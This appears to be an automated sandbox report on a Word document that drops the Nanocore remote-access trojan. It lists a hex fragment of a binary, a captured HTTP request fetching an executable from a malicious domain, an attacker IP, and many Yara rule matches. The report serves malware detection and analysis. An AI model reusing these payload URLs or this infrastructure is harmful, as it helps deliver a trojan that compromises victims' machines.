00 20 00 00 00 32 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 60 0b 00 00 06 00 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 51 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 ab 01 00 08 cd 00 00 03 00 00 00 6b 00 00 06 b0 78 02 00 88 d7 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a 02 72 01 00 00 70 7d 01 00 00 04 02 14 7d 02 00 00 04 02 28 14 00 00 0a 00 00 02 28 06 00 00 06 00 2a 00 13 30 04 00 3f 01 00 00 01 00 00 11 00 02 7b 11 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 5c 02 7b 0d 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 45 02 7b 10 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 2e 02 7b 0f 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 17 02 7b 0e 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2b 01 17 13 04 11 04 2c 11 00 72 5d 00 00 70 28 17 00 00 0a 26 38 b2 00 00 00 02 7b 01 00 00 04 73 18 00 00 0a 0a 1f 0b 8d 3d 00 00 01 25 16 72 79 00 00 70 a2 25 17 02 7b 11 00 00 04 6f 15 00 00 0a a2 25 18 72 10 01 00 70 a2 25 19 02 7b 10 00 00 04 6f 15 00 00 0a a2 25 1a 72 10 01 00 70 a2 25 1b 02 7b 0e 00 00 04 6f 15 00 00 0a a2 25 1c 72 10 01 00 70 a2 25 1d 02 7b 0f 00 00 04 6f 15 00 00 0a a2 25 1e 72 10 01 00 70 a2 25 1f 09 02 7b 0d 00 00 04 6f 15 00 00 0a a2 25 1f 0a 72

Source: Joe Sandbox View

IP Address: 185.239.243.112 185.239.243.112

Source: Joe Sandbox View	ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Source: global traffic

HTTP traffic detected: GET /modex/catx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gqConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.177
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.177
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown	UDP traffic detected without corresponding DNS query: 37.235.1.174

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4C37CD3-97C0-4A14-814E-1968BCE52029}.tmp

Jump to behavior

Source: global traffic

Source: unknown

DNS traffic detected: queries for: carbinz.gq

Source: cat464923.exe, 00000005.00000002.2352132844.0000000005800000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347261747.0000000001CB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: cat464923.exe, 00000005.00000002.2352132844.0000000005800000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347261747.0000000001CB0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA

Source: cat464923.exe, 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Source: Yara match	File source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.2324e04.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.440000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.cat464923.exe.22a4dc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.24aeb3c.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
